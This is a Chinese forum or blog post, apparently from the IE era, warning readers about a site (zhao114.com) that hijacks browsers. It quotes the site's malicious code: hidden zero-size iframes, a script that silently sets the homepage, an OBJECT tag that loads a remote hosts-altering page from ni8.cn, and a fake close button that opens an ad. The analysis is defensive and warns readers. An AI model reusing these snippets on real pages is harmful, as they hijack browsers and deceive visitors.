精通系统安全防范十大技巧·四个小麻雀迷你软件保安全·IE与Mozilla惊现多个高危漏洞

微软最新安全漏洞大揭秘·目前已知的38个超恶性网站名单

早就听说了某些网站的恶意代码，没想到愚人节让我碰上一回，一个朋友说道zhao114.com怎么火爆，我就好奇看了眼，简单的网址站，但是弹出另外的网页，开始没大在意，后来发现，这个网站居然修改默认主页、修改Hosts文件、添加桌面，另外还使用一些页面欺骗的手法。好奇之下就分析了一下他的源码，列出如下，请大家小心了：

1) IE防止不住弹出窗口的方法

该网站无数次采用

<iframe src="网址" width="0" height="0" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>

的方式弹出新窗口，包含广告和病毒代码。

2) 不提示设置首页弹出一个js文件(setmyhome.js)。

主要代码是下面的sethome()函数

<!--
function GetCookie (name) {
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i < clen) {
var j = i + alen;
if (document.cookie.substring(i, j) == arg)
return getCookieVal (j);
i = document.cookie.indexOf(" ", i) + 1;
if (i == 0) break;
}
return null;
}

function SetCookie (name, value) {
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
}

function DeleteCookie (name) {
var exp = new Date();
exp.setTime (exp.getTime() - 1);
// This cookie is history
var cval = 0;
document.cookie = name + "=" + cval + "; expires=" + exp.toGMTString();
}

//设置cookies时间,自己根据情况设置。
var expDays = 1;//这里设为 1 天
var exp = new Date();
exp.setTime(exp.getTime() + (expDays*24*60*60*1000));

function amt(){
var count = GetCookie('count'); //同一ip只显示一次
//var count;//同一ip只显示N次
//alert(count);
//count = null;
if(count == null) {
SetCookie('count','1')
return 1
}
else{
var newcount = parseInt(count) + 1;
if(newcount<2) count=1;
SetCookie('count',newcount,exp);
//DeleteCookie('count')
return newcount
}
}

function getCookieVal(offset) {
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1)
endstr = document.cookie.length;
return unescape(document.cookie.substring(offset, endstr));
}

function sethome(){
document.links[0].style.behavior='url(#default#homepage)';
document.links[0].setHomePage('http://www.zhao114.com');
}

if(amt()==1)
{
sethome()
}
//-->

3) 强行修改hosts文件(in yan88.htm)
<script src="../ads/banner.js"></script>
(in banner.htm)
<IFRAME border=0 marginWidth=0 marginHeight=0 src="banner_files/wo.htm" frameBorder=no width=0 scrolling=no height=0></IFRAME>
(in wo.htm)
<OBJECT height=0 width=0 data=http://www.ni8.cn/set/setdns.chtm></OBJECT>
(in setdns.chtm)
这就是代码

4) 页面欺骗页面右边出现一个浮动广告，告诉别人有短消息，点X位置不是关闭，反而使点击广告了(中计)。

代码如下：

<SPAN title=关闭 style="FONT-WEIGHT: bold; FONT-SIZE: 12px; CURSOR: hand; COLOR: red; MARGIN-RIGHT: 4px"
onclick="javascript:closeDiv();window.open('http://www.zhao114.com/v.htm')">×</SPAN>

另外，他添加桌面的方式我就没有时间研究了，留给有兴趣的朋友，不过研究之前千万小心，最好先GHOST一个备份。另外，这里有一个目前已知的38个超恶性网站的列表，大家需要小心了。感染了的朋友，可以到3721下载一个上网助手2005迅速解决问题。